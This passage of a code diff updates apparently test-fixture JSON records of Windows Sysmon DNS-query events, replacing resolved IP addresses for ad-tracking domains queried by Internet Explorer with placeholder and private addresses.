UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12212,37 +12081,37 @@ "type": "CNAME" }, { - "data": "37.157.2.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.253", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.2.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.247", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -12258,18 +12127,13 @@ "cm.adform.net" ], "ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741923300Z", + "ingested": "2021-12-09T13:50:23.457286100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12329,12 +12193,12 @@ }, "answers": [ { - "data": "37.18.16.16", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "network": { 
@@ -12349,13 +12213,13 @@ "dm.hybrid.ai" ], "ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742077900Z", + "ingested": "2021-12-09T13:50:23.457291900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12419,11 +12283,11 @@ "type": "CNAME" }, { - "data": "199.166.0.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12431,7 +12295,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12439,7 +12303,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12447,7 +12311,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -12455,21 +12319,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -12485,22 +12349,22 @@ "static.adsafeprotected.com" ], "ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742084900Z", + "ingested": "2021-12-09T13:50:23.457297700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.692Z",
@@ -12564,27 +12428,27 @@
 "type": "CNAME"
 },
 {
- "data": "151.101.130.2",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.194.2",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.2.2",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.66.2",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "151.101.130.2",
- "151.101.194.2",
- "151.101.2.2",
- "151.101.66.2"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -12600,16 +12464,13 @@ "trc.taboola.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742094200Z", + "ingested": "2021-12-09T13:50:23.457305700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12668,12 +12529,12 @@ }, "answers": [ { - "data": "107.178.254.65", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "network": { 
@@ -12688,13 +12549,13 @@ "pippio.com" ], "ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742102700Z", + "ingested": "2021-12-09T13:50:23.457311700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12758,11 +12619,11 @@ "type": "CNAME" }, { - "data": "209.15.36.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12770,7 +12631,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12778,7 +12639,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12786,7 +12647,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -12794,21 +12655,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "209.15.36.34",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -12824,22 +12685,22 @@ "pixel-sync.sitescout.com" ], "ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742108800Z", + "ingested": "2021-12-09T13:50:23.457317500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
